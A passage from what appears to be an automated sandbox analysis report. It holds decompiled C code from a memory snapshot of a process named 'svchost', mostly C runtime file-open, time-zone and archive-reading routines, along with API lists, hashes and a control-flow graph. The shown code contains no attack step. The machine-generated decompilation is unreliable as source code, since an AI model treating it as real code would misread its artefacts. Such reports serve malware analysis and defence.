                            						if(_t253 != 0xffffffff) {
                            							L11:
                            							_t123 = GetFileType(_t253); // executed
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t123 - 2;
                            								if(_t123 != 2) {
                            									__eflags = _t123 - 3;
                            									_t124 = _v48;
                            									if(_t123 == 3) {
                            										_t124 = _t124 | 0x00000008;
                            										__eflags = _t124;
                            									}
                            								} else {
                            									_t124 = _v48 | 0x00000040;
                            								}
                            								_v5 = _t124;
                            								E00BCE6CC(_t197,  *_t190, _t253);
                            								_t243 = _v5 | 0x00000001;
                            								_v5 = _t243;
                            								_v48 = _t243;
                            								 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
                            								_t203 =  *_t190;
                            								_t205 = (_t203 & 0x0000003f) * 0x30;
                            								__eflags = _a16 & 0x00000002;
                            								 *((char*)( *((intOrPtr*)(0xbf6108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                            								if((_a16 & 0x00000002) == 0) {
                            									L20:
                            									_v6 = 0;
                            									_push( &_v6);
                            									_push(_a16);
                            									_t279 = _t278 - 0x18;
                            									_t206 = 6;
                            									_push( *_t190);
                            									memcpy(_t279,  &_v48, _t206 << 2);
                            									_t134 = E00BDB811(_t190,  &_v48 + _t206 + _t206,  &_v48);
                            									_t281 = _t279 + 0x30;
                            									__eflags = _t134;
                            									if(__eflags == 0) {
                            										 *((char*)( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                            										 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                            										__eflags = _v5 & 0x00000048;
                            										if((_v5 & 0x00000048) == 0) {
                            											__eflags = _a16 & 0x00000008;
                            											if((_a16 & 0x00000008) != 0) {
                            												_t225 =  *_t190;
                            												_t227 = (_t225 & 0x0000003f) * 0x30;
                            												_t164 =  *((intOrPtr*)(0xbf6108 + (_t225 >> 6) * 4));
                            												_t87 = _t164 + _t227 + 0x28;
                            												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                            												__eflags =  *_t87;
                            											}
                            										}
                            										_t267 = _v44;
                            										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
                            										if((_t267 & 0xc0000000) != 0xc0000000) {
                            											L31:
                            											__eflags = 0;
                            											return 0;
                            										} else {
                            											__eflags = _a16 & 0x00000001;
                            											if((_a16 & 0x00000001) == 0) {
                            												goto L31;
                            											}
                            											CloseHandle(_v12);
                            											_v44 = _t267 & 0x7fffffff;
                            											_t215 = 6;
                            											_push( &_v24);
                            											_push(_a12);
                            											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
                            											_t246 = E00BDBA5E();
                            											__eflags = _t246 - 0xffffffff;
                            											if(_t246 != 0xffffffff) {
                            												_t217 =  *_t190;
                            												_t219 = (_t217 & 0x0000003f) * 0x30;
                            												__eflags = _t219;
                            												 *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
                            												goto L31;
                            											}
                            											E00BCC998(GetLastError());
                            											 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            											E00BCE895( *_t190);
                            											L10:
                            											goto L2;
                            										}
                            									}
                            									_t270 = _t134;
                            									goto L22;
                            								} else {
                            									_t270 = E00BDBC6F(_t205,  *_t190);
                            									__eflags = _t270;
                            									if(__eflags != 0) {
                            										L22:
                            										E00BD18F4(__eflags,  *_t190);
                            										return _t270;
                            									}
                            									goto L20;
                            								}
                            							}
                            							_t271 = GetLastError();
                            							E00BCC998(_t271);
                            							 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                            							CloseHandle(_t253);
                            							__eflags = _t271;
                            							if(_t271 == 0) {
                            								 *((intOrPtr*)(E00BCC9CE())) = 0xd;
                            							}
                            							goto L2;
                            						}
                            						_t234 = _v44;
                            						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                            						if((_t234 & 0xc0000000) != 0xc0000000) {
                            							L9:
                            							_t235 =  *_t190;
                            							_t237 = (_t235 & 0x0000003f) * 0x30;
                            							_t180 =  *((intOrPtr*)(0xbf6108 + (_t235 >> 6) * 4));
                            							_t33 = _t180 + _t237 + 0x28;
                            							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                            							__eflags =  *_t33;
                            							E00BCC998(GetLastError());
                            							goto L10;
                            						}
                            						__eflags = _a16 & 0x00000001;
                            						if((_a16 & 0x00000001) == 0) {
                            							goto L9;
                            						}
                            						_t285 = _t278 - 0x18;
                            						_v44 = _t234 & 0x7fffffff;
                            						_t239 = 6;
                            						_push( &_v24);
                            						_push(_a12);
                            						memcpy(_t285,  &_v48, _t239 << 2);
                            						_t197 = 0;
                            						_t253 = E00BDBA5E();
                            						_t278 = _t285 + 0x2c;
                            						_v12 = _t253;
                            						__eflags = _t253 - 0xffffffff;
                            						if(_t253 != 0xffffffff) {
                            							goto L11;
                            						}
                            						goto L9;
                            					} else {
                            						 *(E00BCC9BB()) =  *_t186 & 0x00000000;
                            						 *_t190 = _t264;
                            						 *((intOrPtr*)(E00BCC9CE())) = 0x18;
                            						goto L2;
                            					}
                            				} else {
                            					 *(E00BCC9BB()) =  *_t188 & 0x00000000;
                            					 *_a8 = _t264;
                            					L2:
                            					return  *((intOrPtr*)(E00BCC9CE()));
                            				}
                            			}
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdbd78
                            0x00bdbd7d
                            0x00bdbd80
                            0x00bdbd87
                            0x00000000
                            0x00bdbd87
                            0x00bdbd51
                            0x00bdbd56
                            0x00bdbd5c
                            0x00bdbd5e
                            0x00000000
                            0x00bdbd63

                            APIs
                              • Part of subcall function 00BDBA5E: CreateFileW.KERNEL32(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            • GetLastError.KERNEL32 ref: 00BDBE33
                            • __dosmaperr.LIBCMT ref: 00BDBE3A
                            • GetFileType.KERNEL32(00000000), ref: 00BDBE46
                            • GetLastError.KERNEL32 ref: 00BDBE50
                            • __dosmaperr.LIBCMT ref: 00BDBE59
                            • CloseHandle.KERNEL32(00000000), ref: 00BDBE79
                            • CloseHandle.KERNEL32(?), ref: 00BDBFC3
                            • GetLastError.KERNEL32 ref: 00BDBFF5
                            • __dosmaperr.LIBCMT ref: 00BDBFFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 00000013.00000002.478868146.0000000000BC0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478903755.0000000000BE0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.478915424.0000000000BEC000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478923115.0000000000BEE000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478930775.0000000000BF4000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.478940137.0000000000BF7000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction ID: aa122a0cb5c0f08a7937fc7ee9ad12e62324c386382d1b40c349dc7eee5bdba9
                            • Opcode Fuzzy Hash: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction Fuzzy Hash: BDA10532A14145DFCF19DF68DC92FADBBE1EB06320F15019EE815AB392EB718912CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 78%
                            			E00BDAFBE(void* __eflags, signed int _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				int _v16;
                            				int _v20;
                            				int _v24;
                            				char _v52;
                            				int _v56;
                            				int _v60;
                            				signed int _v100;
                            				char _v272;
                            				intOrPtr _v276;
                            				char _v280;
                            				char _v356;
                            				char _v360;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t65;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t78;
                            				void* _t80;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t90;
                            				long _t92;
                            				signed int* _t95;
                            				signed int _t98;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t112;
                            				signed int _t115;
                            				void* _t116;
                            				void* _t118;
                            				void* _t119;
                            				void* _t121;
                            				signed int _t123;
                            				signed int _t124;
                            				signed int _t127;
                            				void* _t130;
                            				void* _t132;
                            				signed int _t133;
                            				signed int _t135;
                            				void* _t141;
                            				intOrPtr _t142;
                            				void* _t144;
                            				signed int _t151;
                            				signed int _t152;
                            				signed int _t155;
                            				signed int _t159;
                            				signed int _t162;
                            				intOrPtr* _t167;
                            				intOrPtr _t168;
                            				signed int _t169;
                            				intOrPtr* _t170;
                            				void* _t171;
                            				void* _t172;
                            				signed int _t173;
                            				int _t177;
                            				signed int _t179;
                            				char** _t180;
                            				signed int _t184;
                            				signed int _t186;
                            				void* _t195;
                            				signed int _t196;
                            				void* _t197;
                            				signed int _t198;
                            
                            				_push(_t179);
                            				_t65 = E00BDABFC();
                            				_v8 = _v8 & 0x00000000;
                            				_t135 = _t65;
                            				_v16 = _v16 & 0x00000000;
                            				_v12 = _t135;
                            				if(E00BDAC5A( &_v8) != 0 || E00BDAC02( &_v16) != 0) {
                            					L46:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E00BD1798();
                            					asm("int3");
                            					_t195 = _t197;
                            					_t198 = _t197 - 0x10;
                            					_push(_t135);
                            					_t180 = E00BDABFC();
                            					_v52 = 0;
                            					_v56 = 0;
                            					_v60 = 0;
                            					_t72 = E00BDAC5A( &_v52);
                            					_t144 = _t179;
                            					__eflags = _t72;
                            					if(_t72 != 0) {
                            						L66:
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						_push(0);
                            						E00BD1798();
                            						asm("int3");
                            						_push(_t195);
                            						_t196 = _t198;
                            						_t74 =  *0xbec008; // 0x2eb5fe5e
                            						_v100 = _t74 ^ _t196;
                            						 *0xbec91c =  *0xbec91c | 0xffffffff;
                            						 *0xbec910 =  *0xbec910 | 0xffffffff;
                            						_push(0);
                            						_push(_t180);
                            						_push(_t172);
                            						_t137 = "TZ";
                            						_t173 = 0;
                            						 *0xbf6578 = 0;
                            						_t78 = E00BD6CC0("TZ", _t168, 0, _t180, __eflags,  &_v360,  &_v356, 0x100, "TZ");
                            						__eflags = _t78;
                            						if(_t78 != 0) {
                            							__eflags = _t78 - 0x22;
                            							if(_t78 == 0x22) {
                            								_t186 = E00BD0A25(_t144, _v276);
                            								__eflags = _t186;
                            								if(__eflags != 0) {
                            									_t84 = E00BD6CC0(_t137, _t168, 0, _t186, __eflags,  &_v280, _t186, _v276, _t137);
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E00BD09EB(0);
                            										_t173 = _t186;
                            									} else {
                            										_push(_t186);
                            										goto L72;
                            									}
                            								} else {
                            									_push(0);
                            									L72:
                            									E00BD09EB();
                            								}
                            							}
                            						} else {
                            							_t173 =  &_v272;
                            						}
                            						asm("sbb esi, esi");
                            						_t184 =  ~(_t173 -  &_v272) & _t173;
                            						__eflags = _t173;
                            						if(_t173 == 0) {
                            							L80:
                            							L47(); // executed
                            						} else {
                            							__eflags =  *_t173;
                            							if(__eflags == 0) {
                            								goto L80;
                            							} else {
                            								_push(_t173);
                            								E00BDAFBE(__eflags);
                            							}
                            						}
                            						_t80 = E00BD09EB(_t184);
                            						__eflags = _v16 ^ _t196;
                            						E00BC786A();
                            						return _t80;
                            					} else {
                            						_t88 = E00BDAC02( &_v16);
                            						_pop(_t144);
                            						__eflags = _t88;
                            						if(_t88 != 0) {
                            							goto L66;
                            						} else {
                            							_t90 = E00BDAC2E( &_v20);
                            							_pop(_t144);
                            							__eflags = _t90;
                            							if(_t90 != 0) {
                            								goto L66;
                            							} else {
                            								E00BD09EB( *0xbf6574);
                            								 *0xbf6574 = 0;
                            								 *_t198 = 0xbf6580; // executed
                            								_t92 = GetTimeZoneInformation(??); // executed
                            								__eflags = _t92 - 0xffffffff;
                            								if(_t92 != 0xffffffff) {
                            									_t151 =  *0xbf6580 * 0x3c;
                            									_t169 =  *0xbf65d4; // 0x0
                            									_push(_t172);
                            									 *0xbf6578 = 1;
                            									_v12 = _t151;
                            									__eflags =  *0xbf65c6; // 0xb
                            									if(__eflags != 0) {
                            										_t152 = _t151 + _t169 * 0x3c;
                            										__eflags = _t152;
                            										_v12 = _t152;
                            									}
                            									__eflags =  *0xbf661a; // 0x3
                            									if(__eflags == 0) {
                            										L56:
                            										_v16 = 0;
                            										_v20 = 0;
                            									} else {
                            										_t105 =  *0xbf6628; // 0xffffffc4
                            										__eflags = _t105;
                            										if(_t105 == 0) {
                            											goto L56;
                            										} else {
                            											_v16 = 1;
                            											_v20 = (_t105 - _t169) * 0x3c;
                            										}
                            									}
                            									_t177 = E00BD7D59(0, _t169);
                            									_t98 = WideCharToMultiByte(_t177, 0, "Pacific Standard Time", 0xffffffff,  *_t180, 0x3f, 0,  &_v24);
                            									__eflags = _t98;
                            									if(_t98 == 0) {
                            										L60:
                            										 *( *_t180) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L60;
                            										} else {
                            											( *_t180)[0x3f] = 0;
                            										}
                            									}
                            									_t101 = WideCharToMultiByte(_t177, 0, "Pacific Daylight Time", 0xffffffff, _t180[1], 0x3f, 0,  &_v24);
                            									__eflags = _t101;
                            									if(_t101 == 0) {
                            										L64:
                            										 *(_t180[1]) = 0;
                            									} else {
                            										__eflags = _v24;
                            										if(_v24 != 0) {
                            											goto L64;
                            										} else {
                            											_t180[1][0x3f] = 0;
                            										}
                            									}
                            								}
                            								 *(E00BDABF6()) = _v12;
                            								 *((intOrPtr*)(E00BDABEA())) = _v16;
                            								_t95 = E00BDABF0();
                            								 *_t95 = _v20;
                            								return _t95;
                            							}
                            						}
                            					}
                            				} else {
                            					_t170 =  *0xbf6574; // 0x0
                            					_t179 = _a4;
                            					if(_t170 == 0) {
                            						L12:
                            						E00BD09EB(_t170);
                            						_t155 = _t179;
                            						_t12 = _t155 + 1; // 0xbdb3af
                            						_t171 = _t12;
                            						do {
                            							_t112 =  *_t155;
                            							_t155 = _t155 + 1;
                            						} while (_t112 != 0);
                            						_t13 = _t155 - _t171 + 1; // 0xbdb3b0
                            						 *0xbf6574 = E00BD0A25(_t155 - _t171, _t13);
                            						_t115 = E00BD09EB(0);
                            						_t168 =  *0xbf6574; // 0x0
                            						if(_t168 == 0) {
                            							goto L45;
                            						} else {
                            							_t159 = _t179;
                            							_push(_t172);
                            							_t14 = _t159 + 1; // 0xbdb3af
                            							_t172 = _t14;
                            							do {
                            								_t116 =  *_t159;
                            								_t159 = _t159 + 1;
                            							} while (_t116 != 0);
                            							_t15 = _t159 - _t172 + 1; // 0xbdb3b0
                            							_t118 = E00BD0A73(_t168, _t15, _t179);
                            							_t197 = _t197 + 0xc;
                            							if(_t118 != 0) {
                            								goto L46;
                            							} else {
                            								_t172 = 3;
                            								_push(_t172);
                            								_t119 = E00BD50A9(_t160,  *_t135, 0x40, _t179);
                            								_t197 = _t197 + 0x10;
                            								if(_t119 != 0) {
                            									goto L46;
                            								} else {
                            									while( *_t179 != 0) {
                            										_t179 = _t179 + 1;
                            										_t172 = _t172 - 1;
                            										if(_t172 != 0) {
                            											continue;
                            										}
                            										break;
                            									}
                            									_pop(_t172);
                            									_t135 = _t135 & 0xffffff00 |  *_t179 == 0x0000002d;
                            									if(_t135 != 0) {
                            										_t179 = _t179 + 1;
                            									}
                            									_t162 = E00BD1594(_t160, _t179) * 0xe10;
                            									_v8 = _t162;
                            									while(1) {
                            										_t121 =  *_t179;
                            										if(_t121 != 0x2b && (_t121 < 0x30 || _t121 > 0x39)) {
                            											break;
                            										}
                            										_t179 = _t179 + 1;
                            									}
                            									__eflags =  *_t179 - 0x3a;
                            									if( *_t179 == 0x3a) {
                            										_t179 = _t179 + 1;
                            										_t162 = _v8 + E00BD1594(_t162, _t179) * 0x3c;
                            										_v8 = _t162;
                            										while(1) {
                            											_t130 =  *_t179;
                            											__eflags = _t130 - 0x30;
                            											if(_t130 < 0x30) {
                            												break;
                            											}
                            											__eflags = _t130 - 0x39;
                            											if(_t130 <= 0x39) {
                            												_t179 = _t179 + 1;
                            												__eflags = _t179;
                            												continue;
                            											}
                            											break;
                            										}
                            										__eflags =  *_t179 - 0x3a;
                            										if( *_t179 == 0x3a) {
                            											_t179 = _t179 + 1;
                            											_t162 = _v8 + E00BD1594(_t162, _t179);
                            											_v8 = _t162;
                            											while(1) {
                            												_t132 =  *_t179;
                            												__eflags = _t132 - 0x30;
                            												if(_t132 < 0x30) {
                            													goto L38;
                            												}
                            												__eflags = _t132 - 0x39;
                            												if(_t132 <= 0x39) {
                            													_t179 = _t179 + 1;
                            													__eflags = _t179;
                            													continue;
                            												}
                            												goto L38;
                            											}
                            										}
                            									}
                            									L38:
                            									__eflags = _t135;
                            									if(_t135 != 0) {
                            										_v8 = _t162;
                            									}
                            									__eflags =  *_t179;
                            									_t123 = 0 |  *_t179 != 0x00000000;
                            									_v16 = _t123;
                            									__eflags = _t123;
                            									_t124 = _v12;
                            									if(_t123 == 0) {
                            										_t29 = _t124 + 4; // 0xfffffddd
                            										 *((char*)( *_t29)) = 0;
                            										goto L44;
                            									} else {
                            										_push(3);
                            										_t28 = _t124 + 4; // 0xfffffddd
                            										_t127 = E00BD50A9(_t162,  *_t28, 0x40, _t179);
                            										_t197 = _t197 + 0x10;
                            										__eflags = _t127;
                            										if(_t127 == 0) {
                            											L44:
                            											 *(E00BDABF6()) = _v8;
                            											_t115 = E00BDABEA();
                            											 *_t115 = _v16;
                            											goto L45;
                            										} else {
                            											goto L46;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						_t167 = _t170;
                            						_t133 = _t179;
                            						while(1) {
                            							_t141 =  *_t133;
                            							if(_t141 !=  *_t167) {
                            								break;
                            							}
                            							if(_t141 == 0) {
                            								L8:
                            								_t115 = 0;
                            							} else {
                            								_t9 = _t133 + 1; // 0xdde805eb
                            								_t142 =  *_t9;
                            								if(_t142 !=  *((intOrPtr*)(_t167 + 1))) {
                            									break;
                            								} else {
                            									_t133 = _t133 + 2;
                            									_t167 = _t167 + 2;
                            									if(_t142 != 0) {
                            										continue;
                            									} else {
                            										goto L8;
                            									}
                            								}
                            							}
                            							L10:
                            							if(_t115 == 0) {
                            								L45:
                            								return _t115;
                            							} else {
                            								_t135 = _v12;
                            								goto L12;
                            							}
                            							goto L82;
                            						}
                            						asm("sbb eax, eax");
                            						_t115 = _t133 | 0x00000001;
                            						__eflags = _t115;
                            						goto L10;
                            					}
                            				}
                            				L82:
                            			}

                            APIs
                            • _free.LIBCMT ref: 00BDB040
                            • _free.LIBCMT ref: 00BDB064
                            • _free.LIBCMT ref: 00BDB1EB
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE9410), ref: 00BDB1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDB275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 00BDB2A2
                            • _free.LIBCMT ref: 00BDB3B7
                            Memory Dump Source
                            • Source File: 00000013.00000002.478877972.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID: Pacific Daylight Time$Pacific Standard Time
                            C-Code - Quality: 55%
                            			E00BC1220(void* __ecx, void* __edx) {
                            				void* __ebp;
                            				intOrPtr _t10;
                            				void* _t12;
                            				void* _t14;
                            				intOrPtr _t15;
                            				intOrPtr _t32;
                            				void* _t37;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr _t41;
                            				intOrPtr _t44;
                            				void* _t49;
                            				void* _t51;
                            				void* _t52;
                            
                            				_t38 = __edx;
                            				_t37 = __ecx;
                            				_t39 =  *((intOrPtr*)(_t49 + 8));
                            				if( *_t39 != 0) {
                            					L3:
                            					_t44 =  *((intOrPtr*)(_t49 + 0x14));
                            					_push(0);
                            					L00BC7864();
                            					_t12 = E00BC9F16(_t38,  *_t39, _t10 +  *((intOrPtr*)(_t39 + 4)),  *((intOrPtr*)(_t44 + 4))); // executed
                            					_push( *((intOrPtr*)(_t44 + 8)));
                            					L00BC7864();
                            					_push(_t12);
                            					_t32 = E00BC9808(_t37);
                            					_t51 = _t49 + 0x10;
                            					__eflags = _t32;
                            					if(__eflags != 0) {
                            						_push( *_t39);
                            						L00BC7864();
                            						_t14 = E00BC9B2B(_t32, _t13,  *((intOrPtr*)(_t44 + 8)), 1); // executed
                            						_t52 = _t51 + 0x10;
                            						__eflags = _t14 - 1;
                            						if(__eflags >= 0) {
                            							__eflags =  *((char*)(_t44 + 0x10)) - 1;
                            							if(__eflags != 0) {
                            								L10:
                            								_t15 =  *_t39;
                            								__eflags = _t15;
                            								if(__eflags != 0) {
                            									_push(_t15); // executed
                            									E00BC9889(_t37, _t38, __eflags); // executed
                            									 *_t39 = 0;
                            								}
                            								return _t32;
                            							} else {
                            								_push(_t44);
                            								_t41 = E00BC1030(_t14, _t37, __eflags, _t32);
                            								L00BC9803(_t32);
                            								_t52 = _t52 + 0xc;
                            								_t32 = _t41;
                            								__eflags = _t41;
                            								if(__eflags != 0) {
                            									goto L10;
                            								} else {
                            									E00BC1980(__eflags, "Error decompressing %s\n", _t44 + 0x12);
                            									__eflags = 0;
                            									return 0;
                            								}
                            							}
                            						} else {
                            							_push("Could not read from file\n");
                            							E00BC1980(__eflags);
                            							L00BC9803(_t32);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Could not allocate read buffer\n");
                            						E00BC1980(__eflags);
                            						__eflags = 0;
                            						return 0;
                            					}
                            				} else {
                            					_t10 = E00BC28C0(_t39 + 0x68, "rb");
                            					_t49 = _t49 + 8;
                            					 *_t39 = _t10;
                            					_t59 = _t10;
                            					if(_t10 != 0) {
                            						goto L3;
                            					} else {
                            						_push("Cannot open archive file\n");
                            						E00BC1980(_t59);
                            						return 0;
                            					}
                            				}
                            			}

                            Strings
                            • Could not read from file, xrefs: 00BC12B5
                            • Cannot open archive file, xrefs: 00BC1241
                            • Could not allocate read buffer, xrefs: 00BC1287
                            • Error decompressing %s, xrefs: 00BC12F2
                            Similarity
                            • API ID: htonl$__fread_nolock
                            • String ID: Cannot open archive file$Could not allocate read buffer$Could not read from file$Error decompressing %s
                            Control-flow Graph

                            control_flow_graph 590 bdb193-bdb1bb call bdabfc call bdac5a 595 bdb1c1-bdb1cd call bdac02 590->595 596 bdb2e3-bdb33f call bd1798 call bd6cc0 590->596 595->596 601 bdb1d3-bdb1df call bdac2e 595->601 607 bdb349-bdb34c 596->607 608 bdb341-bdb347 596->608 601->596 609 bdb1e5-bdb206 call bd09eb GetTimeZoneInformation 601->609 610 bdb38f-bdb3a1 607->610 611 bdb34e-bdb35e call bd0a25 607->611 608->610 619 bdb20c-bdb22d 609->619 620 bdb2bf-bdb2e2 call bdabf6 call bdabea call bdabf0 609->620 613 bdb3b1 call bdb193 610->613 614 bdb3a3-bdb3a6 610->614 623 bdb368-bdb381 call bd6cc0 611->623 624 bdb360 611->624 628 bdb3b6-bdb3cd call bd09eb call bc786a 613->628 614->613 617 bdb3a8-bdb3af call bdafbe 614->617 617->628 626 bdb22f-bdb234 619->626 627 bdb237-bdb23e 619->627 644 bdb386-bdb38c call bd09eb 623->644 645 bdb383-bdb384 623->645 630 bdb361-bdb366 call bd09eb 624->630 626->627 633 bdb256-bdb259 627->633 634 bdb240-bdb247 627->634 648 bdb38e 630->648 636 bdb25c-bdb27d call bd7d59 WideCharToMultiByte 633->636 634->633 640 bdb249-bdb254 634->640 654 bdb27f-bdb282 636->654 655 bdb28b-bdb28d 636->655 640->636 644->648 645->630 648->610 654->655 657 bdb284-bdb289 654->657 658 bdb28f-bdb2ab WideCharToMultiByte 655->658 657->658 659 bdb2ad-bdb2b0 658->659 660 bdb2ba-bdb2bd 658->660 659->660 661 bdb2b2-bdb2b8 659->661 660->620 661->620
                            C-Code - Quality: 73%
                            			E00BDB193(void* __eflags) {
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				int _v20;
                            				signed int _v56;
                            				char _v268;
                            				intOrPtr _v272;
                            				char _v276;
                            				char _v312;
                            				char _v316;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				void* _t36;
                            				signed int _t38;
                            				signed int _t42;
                            				void* _t45;
                            				signed int _t49;
                            				void* _t53;
                            				void* _t55;
                            				long _t57;
                            				signed int* _t60;
                            				intOrPtr _t70;
                            				void* _t79;
                            				signed int _t86;
                            				void* _t88;
                            				signed int _t89;
                            				signed int _t91;
                            				int _t95;
                            				void* _t97;
                            				char** _t98;
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t110;
                            				signed int _t111;
                            				intOrPtr _t120;
                            				intOrPtr _t122;
                            
                            				_t98 = E00BDABFC();
                            				_v8 = 0;
                            				_v12 = 0;
                            				_v16 = 0;
                            				_t36 = E00BDAC5A( &_v8);
                            				_t79 = _t97;
                            				if(_t36 != 0) {
                            					L19:
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					E00BD1798();
                            					asm("int3");
                            					_t110 = _t111;
                            					_t38 =  *0xbec008; // 0x2eb5fe5e
                            					_v56 = _t38 ^ _t110;
                            					 *0xbec91c =  *0xbec91c | 0xffffffff;
                            					 *0xbec910 =  *0xbec910 | 0xffffffff;
                            					_push(0);
                            					_push(_t98);
                            					_t76 = "TZ";
                            					_t91 = 0;
                            					 *0xbf6578 = 0;
                            					_t42 = E00BD6CC0("TZ", _t88, 0, _t98, __eflags,  &_v316,  &_v312, 0x100, "TZ");
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						__eflags = _t42 - 0x22;
                            						if(_t42 == 0x22) {
                            							_t104 = E00BD0A25(_t79, _v272);
                            							__eflags = _t104;
                            							if(__eflags != 0) {
                            								_t49 = E00BD6CC0(_t76, _t88, 0, _t104, __eflags,  &_v276, _t104, _v272, _t76);
                            								__eflags = _t49;
                            								if(_t49 == 0) {
                            									E00BD09EB(0);
                            									_t91 = _t104;
                            								} else {
                            									_push(_t104);
                            									goto L25;
                            								}
                            							} else {
                            								_push(0);
                            								L25:
                            								E00BD09EB();
                            							}
                            						}
                            					} else {
                            						_t91 =  &_v268;
                            					}
                            					asm("sbb esi, esi");
                            					_t102 =  ~(_t91 -  &_v268) & _t91;
                            					__eflags = _t91;
                            					if(__eflags == 0) {
                            						L33:
                            						E00BDB193(__eflags); // executed
                            					} else {
                            						__eflags =  *_t91;
                            						if(__eflags == 0) {
                            							goto L33;
                            						} else {
                            							_push(_t91);
                            							E00BDAFBE(__eflags);
                            						}
                            					}
                            					_t45 = E00BD09EB(_t102);
                            					__eflags = _v12 ^ _t110;
                            					E00BC786A();
                            					return _t45;
                            				} else {
                            					_t53 = E00BDAC02( &_v12);
                            					_pop(_t79);
                            					if(_t53 != 0) {
                            						goto L19;
                            					} else {
                            						_t55 = E00BDAC2E( &_v16);
                            						_pop(_t79);
                            						if(_t55 != 0) {
                            							goto L19;
                            						} else {
                            							E00BD09EB( *0xbf6574);
                            							 *0xbf6574 = 0;
                            							 *_t111 = 0xbf6580; // executed
                            							_t57 = GetTimeZoneInformation(??); // executed
                            							if(_t57 != 0xffffffff) {
                            								_t86 =  *0xbf6580 * 0x3c;
                            								_t89 =  *0xbf65d4; // 0x0
                            								_push(_t90);
                            								 *0xbf6578 = 1;
                            								_v8 = _t86;
                            								_t120 =  *0xbf65c6; // 0xb
                            								if(_t120 != 0) {
                            									_v8 = _t86 + _t89 * 0x3c;
                            								}
                            								_t122 =  *0xbf661a; // 0x3
                            								if(_t122 == 0) {
                            									L9:
                            									_v12 = 0;
                            									_v16 = 0;
                            								} else {
                            									_t70 =  *0xbf6628; // 0xffffffc4
                            									if(_t70 == 0) {
                            										goto L9;
                            									} else {
                            										_v12 = 1;
                            										_v16 = (_t70 - _t89) * 0x3c;
                            									}
                            								}
                            								_t95 = E00BD7D59(0, _t89);
